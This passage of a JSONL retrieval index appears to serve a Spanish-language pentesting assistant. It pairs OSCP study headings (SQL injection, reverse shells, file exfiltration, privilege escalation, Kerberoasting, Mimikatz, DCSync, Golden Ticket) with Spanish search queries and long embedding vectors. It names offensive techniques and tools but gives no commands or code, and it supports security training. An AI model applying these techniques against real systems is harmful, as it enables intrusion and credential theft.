"PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### 🌐 ExplotaciΓ³n web\n- Hacking web (Γ­ndice/metodologΓ­a) Β· Burp Suite Β· Burp Repeater e Intruder\n- SQL injection Β· Command injection Β· Directory traversal Β· LFI a RCE\n- File upload bypass Β· XSS Β· SSTI Β· Authentication attacks", "indexar": "con que programa puedo realizar inyecciones SQL y ataques de autentificacion", "v": [-0.18122, 0.09362, -0.18212, -0.14946, 0.13572, -0.21789, 0.00265, -0.07454, -0.08793, 0.05654, -0.08618, -0.0552, 0.04764, -0.09822, -0.07637, 0.08426, 0.02997, -0.08722, 0.02915, 0.0867, 0.09539, 0.01647, 0.08937, 0.034, -0.01067, -0.01277, 0.02131, 0.07009, 0.04453, -0.1655, -0.05256, -0.04245, 0.01202, 0.01367, 0.11839, -0.00572, -0.02929, 0.05276, 0.02664, -0.06211, -0.04192, -0.09101, -0.20111, -0.02942, 0.09517, 0.0568, 0.07806, 0.02317, 0.02835, -0.05851, -0.0076, 0.00352, -0.15602, -0.11269, -0.00231, -0.00524, 0.03204, -0.09573, 0.08282, 0.05586, -0.07091, 0.07326, 0.06434, -0.02067, 0.02076, 0.00288, 0.09606, -0.02349, -0.02825, 0.11164, -0.06456, -0.04791, -0.03994, -0.01485, 0.04755, -0.01212, 0.04097, 0.02581, 0.05248, -0.04935, -0.13215, -0.00408, -0.06109, 0.10741, -0.03775, -0.01283, 0.0219, -0.01297, 0.03719, -0.08436, 0.07249, -0.01325, 0.04562, 0.03244, 0.00576, -0.00981, 0.04695, -0.07125, 0.00234, 0.00157, 0.00684, -0.03636, -0.0957, 0.21461, -0.01438, 0.04508, 0.06617, -0.0332, 0.00748, -0.07101, -0.00864, -0.01796, -0.08721, -0.06491, -0.01889, 0.00866, -0.06036, 0.0007, 0.0516, -0.02119, -0.1193, -0.01617, 0.00125, 0.05663, 0.02591, 0.01564, -0.02518, 0.05219, -0.10872, -0.02273, -0.01654, 0.07426, -0.02232, 0.00032, -0.03929, 0.03953, -0.03318, -0.12567, 0.01272, -0.05722, 0.01455, 0.03805, 0.06838, -0.004, 0.07135, 0.03117, -0.02776, -0.06917, -0.09368, 0.0392, 0.04882, -0.00595, 0.01219, 0.09305, -0.0667, -0.00734, 0.06377, -0.0565, -0.03975, 0.07661, -0.0307, 0.03069, -0.03718, -0.01691, -0.00241, -0.02748, 0.00791, -0.04577, 0.12421, 0.04408, 0.02069, 0.10698, 0.07327, -0.11804, -0.02051, 0.03791, -0.01912, -0.08054, 0.07692, -0.04858, -0.06012, -0.0453, -0.00389, -0.02732, 0.01637, -0.02498, -0.00513, 0.03371, 0.03707, 0.00441, 0.02441, 0.04142, -0.03873, 0.00261, 0.01732, -0.06082, -0.05618, -0.01902, 0.02302, -0.01544, -0.01597, -0.02895, -0.06981, -0.05705, 0.03912, 0.12542, -0.0637, 0.01233, 0.02505, 0.04422, 0.03136, -0.03964, 0.08927, -0.03076, -0.03816, -0.04629, 0.04447, 0.01543, 0.02448, 0.02913, -0.01319, 0.0189, 0.09034, 0.02455, -0.02243, -0.09787, 0.01496, -0.0203, 0.04332, 0.08284, -0.0105, -0.01973, -0.00115, -0.05999, 0.07132, 0.00574, 0.03945, -0.08677, -0.05903, -0.03834, 0.01863, 0.07955, 0.0096, 0.0096, -0.06211, -0.01366, -0.11383, 0.02949, -0.00789, -0.05644, -0.01143, 0.02253, 0.00682, 0.01159, 0.03481, -0.01079]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### 🌐 ExplotaciΓ³n web\n- Hacking web (Γ­ndice/metodologΓ­a) Β· Burp Suite Β· Burp Repeater e Intruder\n- SQL injection Β· Command injection Β· Directory traversal Β· LFI a RCE\n- File upload bypass Β· XSS Β· SSTI Β· Authentication attacks", "indexar": "cual es una alternativa libre a Burp Suite para el pentesting", "v": [-0.01033, 0.00783, -0.09848, 0.01242, -0.14122, -0.01162, 0.01586, -0.18343, -0.1, -0.05814, -0.10268, 0.02579, -0.04399, 0.03894, -0.03727, -0.08554, -0.16255, -0.06291, 0.18205, -0.00818, -0.01982, 0.05671, -0.08375, -0.02517, -0.03717, 0.01163, 0.08035, 0.05596, -0.01261, 0.09436, 0.01124, -0.01268, 0.00712, -0.0017, 0.00432, -0.11336, 0.07735, 0.08943, 0.05589, -0.01252, 0.07226, -0.07109, -0.0446, 0.1994, -0.09724, -0.08358, -0.06502, 0.14785, 0.08532, 0.06198, -0.14892, -0.02047, -0.04625, 0.02886, 0.10637, -0.03508, 0.12069, -0.09578, -0.03657, -0.03775, 0.0564, 0.0969, -0.01701, -0.1184, 0.04429, -0.07654, 0.04189, -0.06958, -0.01661, 0.03172, 0.00243, -0.02007, 0.07788, 0.02023, -0.14655, 0.02204, -0.12652, 0.00432, 0.00848, 0.0281, 0.0501, -0.02571, -0.09252, 0.10905, -0.04097, -0.12638, 0.09737, -0.16191, -0.05668, 0.08163, 0.05366, 0.02981, 0.05846, 0.13736, -0.00239, -0.08392, 0.04714, 0.13679, 0.04716, 0.07162, 0.10827, 0.04672, -0.0871, 0.0259, -0.05285, -0.04701, -0.03786, 0.07374, -0.02937, -0.01069, -0.03767, 0.09617, -0.03419, -0.01208, -0.05919, -0.11167, -0.04708, 0.00395, 0.02535, -0.05727, -0.03798, -0.00993, -0.03346, -0.06451, 0.01646, 0.05129, -0.00488, 0.02161, -0.02188, 0.04936, 0.01854, -0.01105, -0.07413, -0.1011, -0.06219, -0.065, 0.05154, -0.04145, -0.01532, -0.01023, -0.02387, 0.02862, -0.01385, -0.05477, 0.05218, -0.03166, 0.03783, -0.10237, 0.02254, -0.02043, -0.08513, -0.00295, -0.05429, 0.04456, -0.03265, 0.03395, -0.08385, -0.00136, -0.03525, 0.0499, -0.01955, -0.03116, -0.02061, 0.02619, 0.0564, -0.05153, 0.00564, 0.00551, -0.04645, 0.03091, 0.00485, 0.0614, 0.00804, -0.05797, 0.06775, -0.01259, -0.00708, -0.08867, 0.0258, -0.02056, 0.0295, 0.02621, -0.09095, -0.02616, -0.04156, -0.08381, 0.00289, 0.03649, 0.07568, 0.02277, -0.05904, 0.00025, -0.07391, -0.1051, -0.05317, -0.03414, -0.01314, -0.14946, -0.01599, -0.04261, -0.09345, 0.0069, -0.03172, -0.05472, -0.01138, -0.01351, -0.01785, 0.03046, -0.0387, 0.09199, 0.04628, -0.01042, 0.0864, 0.01657, -0.07086, 0.01409, 0.01151, -0.00239, 0.02784, 0.00879, -0.00729, 0.05908, 0.03855, 0.02177, -0.02007, 0.03942, 0.03358, 0.03709, -0.066, 0.04471, 0.00684, 0.01656, -0.05292, 0.03733, 0.01262, 0.01594, 0.04598, 0.05009, -0.01183, -0.01624, 0.10007, 0.05867, -0.05962, -0.00392, -0.02985, 0.0066, -0.09606, 0.0147, -0.05474, -0.02957, 0.00953, 0.0289, 0.01999, -0.01488, 0.04355, 0.0052]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### 🐚 Shells y transferencia\n- Puesto de mando Kali Β· Reverse shell Β· Estabilizar shell TTY\n- Egress filtering Β· Transferencia de ficheros", "indexar": "que programa sirve para ejecutar un reverse shell desde una consola?", "v": [0.05553, -0.05649, -0.17518, -0.08091, -0.00119, -0.20709, -0.06058, -0.14131, 0.05453, -0.0656, -0.18323, 0.01922, 0.0607, -0.13769, 0.0226, -0.0156, 0.00712, -0.10761, 0.05475, 0.07265, 0.00228, -0.00694, 0.05367, -0.1328, -0.00894, 0.12833, 0.08788, 0.09571, -0.0181, -0.11475, -0.09696, -0.1566, 0.12894, -0.13138, 0.01962, 0.05086, -0.03585, -0.04275, 0.02285, 0.0373, 0.05304, 0.03352, -0.05969, 0.07797, 0.0887, -0.02202, 0.13026, 0.00032, 0.02664, -0.02873, -0.02648, -0.01195, -0.07691, 0.05238, 0.12184, -0.06992, 0.00258, -0.15395, 0.03818, -0.03175, -0.08128, -0.02197, 0.07739, 0.0053, 0.10867, 0.04827, -0.09133, -0.10492, -0.06055, 0.01865, -0.16165, 0.00975, 0.03275, -9e-05, -0.11851, -0.08289, -0.04706, -0.02225, 0.038, -0.03766, -0.04953, -0.13703, -0.09438, 0.05447, 0.0416, 0.0084, -0.00017, -0.06592, 0.00761, -0.03028, 0.00311, 0.00357, -0.01284, 0.13484, 0.06204, -0.05594, 0.12148, 0.01827, -0.0147, 0.03022, 0.08377, -0.06501, -0.05412, 0.11188, -0.02271, 0.08192, -0.00145, -0.00198, -0.02716, 0.10771, -0.01358, 0.01229, 0.0021, 0.01518, -0.05234, -0.0114, -0.08671, -0.03467, 0.14572, -0.00033, -0.05302, 0.04422, -0.06564, -0.02216, 0.00023, 0.01381, -0.06717, 0.06917, -0.01831, 0.08498, -0.01524, -0.05912, 0.03216, 0.03755, -0.06329, 0.02903, 0.05532, -0.03567, -0.0011, -0.07554, 0.10365, 0.16411, 0.00032, -0.03309, 0.05851, -0.01677, 0.11033, -0.04625, 0.00502, 0.00732, 0.0633, 0.04863, 0.0022, 0.03035, -0.02717, -0.02433, 0.02681, 0.04345, -0.08009, 0.0397, -0.06166, -0.01271, -0.05588, -0.01413, 0.05463, -0.0415, -0.10364, 0.04641, 0.06298, 0.06462, -0.03762, 0.04995, 0.06961, -0.02567, 0.03256, 0.01863, -0.02445, 0.01543, 0.05689, -0.02849, -0.03682, 0.01211, 0.0172, -0.03292, -0.06169, -0.03809, -0.02898, 0.01209, 0.01008, -0.01297, 0.01822, 0.04271, -0.02412, -0.05758, 0.01272, 0.05732, -0.00842, -0.04522, 0.00054, -0.02969, 0.0109, 0.03609, 0.01539, -0.02238, -0.00394, 0.0542, -0.04583, -0.01261, 0.00176, 0.06312, -0.00242, 0.06817, 0.03888, 0.15086, 0.02888, -0.05467, 0.04153, 0.04962, 0.04942, 0.07939, -0.0274, -0.04898, 0.03117, -0.00257, -0.03611, -0.09714, 0.02641, 0.00452, -0.00841, -0.06279, 0.01268, 0.00523, 0.04177, 0.00318, -0.03425, -0.01166, 0.00835, -0.05929, 0.02368, -0.05338, -0.04139, 0.05052, -0.00987, -0.08281, 0.01448, -0.03967, -0.02488, -0.0445, 0.00978, 0.00038, -0.02512, 0.02649, 0.031, -0.01379, -0.02422, 0.01986]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### 🐚 Shells y transferencia\n- Puesto de mando Kali Β· Reverse shell Β· Estabilizar shell TTY\n- Egress filtering Β· Transferencia de ficheros", "indexar": "con que herramienta puedo transferir archivos fuera del sistema?", "v": [0.10729, 0.09168, -0.09385, -0.19889, 0.02258, -0.09168, -0.04261, -0.03762, -0.05718, -0.04043, -0.17887, -0.04095, 0.04321, -0.02763, 0.06448, 0.04934, 0.09124, -0.07398, 0.03543, -0.07164, 0.00376, 0.0004, -0.05184, -0.12249, -0.09711, 0.01828, -0.01916, 0.01534, -0.26777, 0.02693, -0.01635, 0.0142, 0.17, -0.05139, -0.02789, -0.04435, 0.03545, 0.13419, -0.02476, 0.00538, 0.04911, 0.05639, -0.01189, 0.11923, 0.02211, -0.10872, -0.03461, -0.03194, 0.0521, -0.03092, -0.01771, -0.17881, -0.14682, -0.03733, -0.00448, -0.19529, 0.15408, -0.12902, 0.01909, -0.02852, -0.05439, 0.08802, -0.07599, -0.01289, 0.01627, 0.02988, -0.05572, -0.06015, -0.17679, 0.14422, 0.04791, 0.06824, 0.07181, 0.05258, -0.11691, 0.0078, 0.0365, 0.00023, -0.03605, -0.05853, 0.05971, -0.02517, -0.01246, -0.00959, 0.03495, -0.06108, 0.02226, -0.01447, 0.06273, -0.03733, -0.0039, -0.0636, 0.04054, -0.00575, 0.07875, -0.03439, -0.03886, -0.0147, -0.06526, -0.08853, 0.05102, 0.04034, -0.06386, 0.1041, -0.0413, 0.02111, 0.05325, -0.04015, 0.02641, -0.08209, 0.08107, 0.01804, 0.0842, 0.0543, -0.02524, 0.08818, -0.06037, 0.00745, -0.07378, -0.00496, 0.01319, 0.04188, -0.02253, -0.07011, 0.05076, -0.06172, -0.05912, 0.095, -0.02779, 0.0255, 0.02173, 0.01496, -0.10755, 0.02063, -0.06792, -0.06027, 0.03157, 0.00629, 0.0221, -0.04948, -0.00877, 0.03843, 0.02197, -0.09641, 0.06157, 0.0218, 0.03125, -0.08347, -0.0335, -0.11758, -0.00366, -0.0098, -0.0167, 0.00646, -0.057, 0.03041, 0.03041, -0.04938, -0.13218, -0.00479, -0.0694, 0.03165, 0.02108, 0.00858, -0.03951, -0.04807, 0.08801, -0.0163, 0.06578, 0.01845, 0.03681, 0.02362, 0.06399, -0.02165, -0.00055, -0.01828, -0.06677, -0.07311, 0.0499, -0.05157, -0.04356, 0.04897, -0.01565, -0.01459, 0.03428, 0.0121, 0.01165, 0.04525, -0.02726, 0.08393, 0.00083, 0.06877, 0.03429, -0.00758, -0.00696, 0.00073, -0.07054, -0.04346, 0.01469, 0.0158, -0.04129, 0.02117, 0.03924, -0.09543, 0.017, 0.08602, -0.01336, 0.00373, 0.00551, 0.05006, 0.01993, -0.00739, 0.10767, -0.04554, -0.01961, -0.0003, -0.06259, -0.00799, 0.00276, -0.01991, 0.06468, 0.00286, 0.04921, 0.02079, -0.01756, 0.03247, -0.01946, 0.03085, -0.03718, -0.03081, 0.00024, -0.01045, 0.05425, -0.01693, 0.0532, -0.07237, -0.01066, -0.0569, -0.06611, -0.00815, -0.02518, 0.06593, -0.00297, 0.00171, -0.05746, -0.0294, -0.06028, -0.04703, 9e-05, -0.12016, -0.00939, 0.0599, 0.04562, -0.03539, 0.04004, -0.00406]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### 🐚 Shells y transferencia\n- Puesto de mando Kali Β· Reverse shell Β· Estabilizar shell TTY\n- Egress filtering Β· Transferencia de ficheros", "indexar": "como estabilizo el acceso a la terminal o TTY?", "v": [-0.17787, 0.00872, -0.15276, -0.01986, 0.11969, 0.02918, -0.01713, -0.04013, 0.07892, 0.28342, -0.16965, 0.05442, 0.06872, 0.20817, 0.10781, 0.04666, 0.01561, -0.12748, 0.18498, -0.00898, 0.06079, 0.04795, -0.05458, 0.06732, 0.16228, -0.00453, 0.03366, -0.15777, -0.11214, -0.05096, 0.09048, -0.16564, 0.10148, -0.08867, 0.04894, -0.02748, -0.00935, 0.09386, -0.02292, 0.0811, 0.03753, -0.05868, -0.07644, 0.05836, 0.08851, 0.0172, 0.07281, 0.03377, 0.09034, -0.01278, -0.03227, 0.00596, -0.11286, 0.09122, 0.03655, -0.05128, 0.08999, -0.041, 0.11683, 0.03355, -0.04565, -0.01774, -0.02414, 0.01249, -0.04793, -0.03788, -0.04868, 0.15326, -0.07553, 0.0675, -0.07083, 0.0019, -0.01511, 0.03152, 0.05579, 0.07591, -0.09429, 0.0712, 0.15122, 0.03169, -0.04327, -0.00443, -0.05807, -0.07878, -0.079, -0.09264, -0.03932, 0.03253, -0.02486, 0.05985, 0.12885, 0.06695, -0.02249, 0.05504, -0.11986, -0.05022, -0.08685, 0.03532, -0.00943, 0.00137, 0.01463, 0.11645, -0.02505, 0.04304, -0.02604, -0.01396, 0.03436, -0.10105, 0.02791, -0.03931, 0.02338, -0.02626, 0.06281, -0.02693, -0.04507, 0.0051, -0.00646, 0.0013, -0.01734, -0.06309, -0.06021, -0.09757, 0.0072, -0.03912, 0.01156, -0.01882, -0.05066, 0.04637, 0.04112, 0.02498, 0.00766, 0.04675, -0.04341, -0.00153, -0.07893, -0.0054, 0.03795, -0.13075, 0.00301, 0.04841, 0.01964, 0.04822, 0.03018, 0.03627, 0.07951, 0.05895, -0.07135, 0.04487, -0.06288, -0.00713, 0.04893, -0.00247, -0.02186, -0.01787, -0.02113, 0.01432, 0.0297, -0.03, -0.02529, 0.09151, -0.08137, -0.04304, -0.05964, -0.01173, 0.00313, -0.00508, -0.05612, -0.03673, 0.02486, -0.05169, -0.00776, -0.02818, -0.01761, 0.03996, 0.0204, -0.05927, -0.01343, -0.012, 0.01079, -0.0019, -0.03949, -0.00294, -0.04625, -0.0178, -0.00887, -0.02145, 0.00136, -0.0362, 0.04414, 0.09146, 0.0752, 0.03369, -0.03299, 0.04808, 0.00227, -0.0574, -0.02542, -0.00352, -0.02232, 0.01681, -0.06772, 0.0515, 0.01858, -0.04888, 0.09084, 0.04393, -0.05857, 0.05838, 0.00254, 0.05229, -0.00042, 0.00015, 0.02284, 0.04507, -0.00569, -0.02215, -0.03587, 0.00326, 0.00348, 0.00253, 0.0068, 0.00064, 0.05786, 0.05089, -0.01133, -0.02674, 0.06743, 0.07387, 0.02389, 0.01161, -0.00589, 0.02693, -0.00291, -0.06386, 0.0104, 0.02226, -0.00695, -0.03114, -0.01733, -0.05184, 0.03494, 0.0639, -0.02724, 0.00345, 0.00906, -0.0381, -0.05325, 0.05718, 0.00553, -0.01792, -0.0338, 0.0445, 0.02107, -0.01477, -0.03297, 0.00554]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### ⬆️ Escalada de privilegios\n- Privesc Linux Β· Privesc Windows Β· PEASS-ng\n- Potato attacks Β· GTFOBins y LOLBAS", "indexar": "quΓ© herramientas sirven para realizar la escalada de privilegios en sistemas Windows?", "v": [0.19893, 0.06263, -0.15375, -0.14558, 0.03438, -0.11359, -0.06168, -0.14564, 0.00801, -0.08433, -0.03691, -0.05296, -0.06942, -0.07917, 0.11546, 0.00297, 0.00307, -0.064, 0.0044, 0.05915, -0.03058, -0.07245, -0.03131, -0.00353, -0.08302, -0.01793, 0.04418, -0.01616, -0.20797, 0.09534, 0.06141, 0.09215, -0.03017, -0.08013, 0.02048, -0.02693, -0.06565, 0.1006, 0.01045, -0.05166, -0.03232, 0.09888, -0.035, -0.06942, 0.11207, -0.09273, 0.00113, 0.04875, 0.04503, -0.04673, -0.03851, -0.0953, -0.00951, -0.16846, 0.10567, -0.11616, 0.16533, -0.03338, 0.02046, 0.00131, -0.09835, 0.06531, -0.04186, 0.03536, 0.00074, -0.02883, -0.04117, -0.07818, 0.00203, 0.13524, -0.09682, -0.07675, 0.10442, 0.033, 0.00268, 0.02242, -0.06373, 0.01764, 0.03503, -0.03579, 0.04902, 0.07947, -0.10532, 0.03825, -0.05388, -0.15399, -0.01641, 0.02773, 0.04118, -0.06313, 0.10421, -0.01751, -0.02075, 3e-05, 0.1099, -0.03702, -0.0082, 0.02763, 0.02711, 0.11398, -0.01337, -0.14707, -0.01485, 0.12577, -0.06053, 0.06801, 0.00114, -0.08648, -0.05805, -0.06449, -0.00141, 0.07938, -0.02314, 0.00802, -0.12512, 0.00418, -0.00964, -0.11895, -0.05151, -0.04088, -0.04505, 0.01081, -0.01358, 0.00029, 0.04344, -0.09369, -0.03207, 0.08887, -0.02309, 0.01523, 0.02932, -0.01512, -0.01569, 0.02779, -0.02097, -0.00957, 0.05783, -0.05135, 0.02474, -0.11648, 0.13121, 0.07373, -0.0382, -0.0907, 0.07665, 0.04801, 0.05549, -0.04323, -0.04348, -0.08086, -0.02614, -0.02963, -0.07103, 0.0635, 0.00115, -0.08898, 0.00504, 0.01697, -0.04537, 0.0825, -0.01833, -0.01491, -0.01793, -0.00724, 0.02894, -0.03042, 0.02553, 0.02691, 0.01379, -0.06259, 0.00436, 0.08335, 0.00649, -0.02552, 0.05104, -0.00894, -0.01626, -0.02969, 0.02136, 0.03777, -0.13644, 0.05849, 0.04899, -0.03981, -0.02276, -0.01926, -0.00142, -0.03517, -0.00972, 0.10199, -0.07667, -0.00518, 0.00931, -0.04726, 0.0225, -0.03734, -0.03956, -0.00175, 0.00484, 0.01985, -0.03692, 0.00037, -0.01517, -0.08229, 0.05063, -0.00013, -0.00357, -0.01313, 0.05145, 0.09927, 0.04985, 0.00666, 0.00786, -0.06919, 0.00376, -0.04991, 0.06928, 0.04781, -0.04705, -0.06456, 0.00493, 0.02689, 0.09633, 0.03352, 0.00832, -0.00396, -0.04906, -0.00539, 0.00419, -0.02167, 0.00761, -0.04506, 0.01468, 0.00624, 0.04255, 0.00668, 0.0591, -0.01605, -0.02015, -0.03756, -0.03936, 0.11453, 0.00083, -0.06392, -0.08856, -0.06316, -0.02705, -0.00946, 0.01212, -0.07656, 0.00216, -0.04427, -0.01511, -0.01114, -0.00619, 0.00271]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### ⬆️ Escalada de privilegios\n- Privesc Linux Β· Privesc Windows Β· PEASS-ng\n- Potato attacks Β· GTFOBins y LOLBAS", "indexar": "con quΓ© puedo probar tΓ©cnicas de explotaciΓ³n basadas en GTFOBins o LOLBAS?", "v": [-0.12955, -0.02927, -0.11116, 0.0036, -0.08408, -0.01762, 0.10932, 0.09499, -0.07832, 0.03827, -0.05112, 0.06418, 0.06418, 0.17313, 0.10198, 0.01948, 0.02064, -0.18737, -0.13913, 0.01582, -0.07475, 0.03597, -0.08338, -0.0436, 0.0981, -0.06677, -0.02984, -0.23636, -0.10073, 0.00163, -0.03003, -0.04777, -0.03955, 0.02393, -0.09257, 0.07269, -0.05664, -0.0044, 0.04858, 0.07348, 0.024, -0.14807, -0.11899, -0.00496, 0.16294, -0.0746, -0.04436, 0.03369, -0.10591, -0.09357, -0.02855, -0.00657, 0.01287, -0.11888, 0.0081, -0.14946, 0.01585, -0.09032, -0.06653, 0.1368, 0.00165, -0.08904, 0.02279, -0.07521, 0.02907, -0.10007, 0.02826, 0.08661, 0.01953, 0.04157, -0.03634, 0.10166, -0.06892, -0.03512, 0.01264, 0.01803, -0.01072, 0.05607, 0.1156, -0.02052, -0.09673, -0.04654, -0.08462, 0.11647, -0.0318, -0.10088, 0.10342, -0.06676, 0.00333, -0.16343, 0.08695, 0.00236, -0.03267, 0.00067, -0.01414, -0.10617, 0.09918, -0.02938, 0.03007, -0.0135, -0.03064, 0.01616, -0.04019, 0.04348, -0.01385, 0.01969, 0.11393, -0.10848, -0.04569, -0.0678, -0.05166, 0.01309, -0.08944, -0.02709, 0.0633, 0.03006, -0.10322, -0.02622, -0.04702, 0.0095, -0.00775, 0.01703, -0.02165, 0.02681, 0.07334, -0.01604, -0.02706, 0.13872, 0.02032, 0.03803, -0.02183, 0.01758, -0.05675, 0.0425, 0.03312, -0.00614, 0.04606, -0.03195, -0.08276, -0.0802, 0.00893, 0.09458, 0.02321, -0.02648, 0.05912, 0.02418, 0.0446, -0.12876, -0.01661, -0.01277, 0.05823, -0.07714, 0.02376, 0.06138, -0.04351, -0.03475, 0.00947, -0.04885, -0.02176, 0.10517, 0.01212, 0.02415, -0.06895, 0.05075, -0.0083, 0.02889, -0.0431, -0.07173, 0.01244, -0.00235, -0.06432, 0.00828, -0.00898, 0.03555, 0.06077, -3e-05, -0.03167, 0.01095, -0.00082, -0.09857, -0.01012, 0.03509, -0.02741, -0.03643, -0.01946, -0.03634, 0.01801, -0.01149, 0.04166, 0.02667, 0.05602, 0.08671, 0.01069, 0.03735, -0.01945, -0.06411, -0.01715, 0.01996, -0.01876, -0.00318, 0.00519, -0.02302, -0.04745, 0.01346, 0.00833, -0.00456, -0.02108, 0.05304, -0.10451, 0.00536, 0.05954, -0.08254, 0.03623, -0.12196, -0.00219, 0.02334, 0.02906, -0.04538, 0.00712, 0.01507, -0.0107, 0.05546, 0.0417, -0.01272, -0.03637, -0.01316, 0.04467, 0.03988, 0.03714, 0.02253, 0.00363, 0.07613, -0.06316, -0.06915, 0.01453, 0.05068, 0.02203, 0.01441, -0.05403, -0.00341, -0.01379, 0.07551, -0.02288, 0.00588, -0.03003, -0.03111, -0.06607, 0.03986, 0.01245, -0.02717, -0.04886, 0.01961, 0.04145, -0.04679, -0.00913, -0.06214]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### ⬆️ Escalada de privilegios\n- Privesc Linux Β· Privesc Windows Β· PEASS-ng\n- Potato attacks Β· GTFOBins y LOLBAS", "indexar": "cuΓ‘les son las mejores alternativas libres para escalar privilegios en Linux?", "v": [0.27545, 0.08288, -0.10148, 0.08402, 0.00368, -0.11324, -0.09525, -0.0574, -0.128, -0.03192, 0.05868, -0.09148, -0.00916, -0.03905, 0.15651, -0.1049, -0.1261, -0.06315, -0.00249, 0.03149, -0.07191, 0.05137, -0.17651, -0.11699, 0.03022, -0.11383, 0.05853, -0.05754, 0.00992, 0.07653, 0.00601, 0.11482, -0.03242, -0.0296, 0.0994, 0.05369, 0.04266, 0.07238, 0.06276, -0.04457, 0.02498, 0.01268, 0.01877, -0.06429, -0.04254, -0.141, -0.10328, 0.09497, 0.05903, -0.14172, 0.11917, -0.00079, 0.11494, -0.1182, 0.0812, 0.01369, 0.1359, 0.01449, 0.06671, -0.00841, -0.11168, 0.0626, 0.01864, -0.06475, 0.03666, -0.03251, -0.08999, -0.04074, -0.13093, 0.06032, -0.05025, 0.00325, 0.06061, 0.02278, 0.00598, 0.11086, -0.05817, -0.0082, 0.01198, 0.05504, 0.09073, -0.05452, -0.03072, 0.0716, -0.09428, -0.09918, 0.04945, -0.01115, -0.02554, 0.12014, 0.1127, -0.02444, 0.02315, 0.02663, 0.03506, 0.00516, 0.0956, 0.09739, 0.05545, 0.06381, -0.03701, -0.0107, -0.0734, 0.10464, 0.01127, 0.03972, -0.01439, -0.09532, -0.06778, -0.03174, 0.01013, 0.01144, 0.03181, 0.02413, -0.14447, -0.05725, -0.0825, -0.05774, -0.04968, -0.04592, -0.02816, -0.05347, -0.0053, -0.05175, 0.02696, -0.01082, -0.01118, 0.1085, -0.02308, -0.02655, -0.00443, -0.0628, 0.03772, 0.00376, -0.06707, 0.04061, 0.10058, -0.06068, 0.02203, -0.04404, 0.04472, 0.03695, 0.00051, -0.0237, 0.11605, 0.00511, 0.00095, -0.05504, -0.0333, -0.09828, -0.0543, 0.01066, 0.04042, 0.0699, -0.00996, -0.0753, -0.03592, -0.05516, -0.02141, 0.09132, 0.03805, -0.02517, -0.05284, 0.06575, 0.0283, 0.01744, 0.01079, 0.01427, -0.06673, -0.04917, 0.05133, 0.05923, -0.01197, -0.07602, 0.01053, -0.10226, 0.0352, -0.04626, 0.04162, 0.03554, -0.03596, 0.06241, -0.00499, -0.04923, -0.01161, -0.02647, -0.01907, 0.04089, 0.04071, 0.05656, -0.03397, 0.02042, -0.0127, -0.06566, -0.00789, -0.03371, 0.00481, -0.02769, -0.04591, 0.03264, -0.11089, -0.03297, -0.05189, -0.06955, 0.01317, -0.02368, -0.01443, 0.04058, -0.00373, 0.06014, 0.03254, 0.02248, 0.09728, -0.03873, -0.01273, -0.00093, 0.03395, -0.01479, 0.00451, -0.04071, 0.02093, 0.03061, 0.07334, -0.04865, 0.00278, -0.00258, -0.04245, 0.0224, -0.0077, 0.02451, 0.00551, 0.01204, -0.01942, 0.00315, -0.00802, 0.04871, 0.02214, 0.03947, 0.02456, -0.04354, 0.02951, 0.09996, 0.02745, -0.0405, -0.05818, -0.07208, -0.06121, 0.04406, 0.00426, -0.04643, -0.02766, 0.00093, 0.03368, -0.00235, 0.00991, -0.02853]} -{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### 🏰 Active Directory\n- Active Directory (Γ­ndice) Β· Kerberos Β· Kerberoasting Β· AS-REP Roasting\n- Mimikatz Β· Impacket Β· BloodHound\n- Pass-the-Hash Β· DCSync Β· Golden Ticket Β· Silver Ticket Β· secretsdump\n- Movimiento lateral Β· Pivoting ligolo-ng\n- GPP cpassword Β· LAPS Β· ACL abuses", "indexar": "que herramienta puedo usar para obtener credenciales de dominio con Kerberos?", "v": [-0.12994, -0.04101, -0.1112, -0.09103, 0.01054, -0.10818, 0.00128, 0.0861, -0.12052, -0.12734, -0.14014, -0.00865, -0.07486, -0.24206, 0.04509, 0.04337, 0.09168, -0.05444, -0.01261, -0.00882, 0.06745, -0.0419, -0.11372, -0.0345, -0.06027, -0.0025, -0.0079, -0.12232, -0.04877, 0.14366, -0.01982, 0.03642, -0.00714, -0.02381, -0.08095, -0.08045, -0.13403, 0.14075, 0.07011, 0.14777, 0.04324, 0.04691, -0.03429, 0.08653, -0.01957, 0.06458, -0.07089, -0.02211, -0.0781, -0.04976, 0.035, -0.19053, -0.16803, -0.06637, 0.01643, -0.11743, 0.17152, -0.13637, -0.03458, -0.10432, -0.10284, -0.07665, -0.0713, 0.06248, -0.04932, -0.17218, -0.00729, -0.04088, -0.09455, 0.04292, -0.02016, 0.03406, 0.1067, 0.03656, 0.07173, -0.03344, 0.04129, -0.00818, 0.07371, -0.02378, 0.05395, -0.02171, -0.02095, -0.00392, -0.06193, -0.17091, 0.02073, -0.09556, 0.04289, -0.02155, -0.00513, 0.0931, -0.04535, -0.06585, -0.03088, -0.03863, -0.05646, -0.04833, -0.0749, -0.05161, 0.11832, 0.00236, -0.05376, 0.0662, 0.04352, 0.01418, -0.01403, -0.01373, -0.03772, -0.05241, 0.03295, 0.01368, -0.04885, -0.00319, -0.05887, 0.15811, -0.06475, -0.04913, 0.0313, 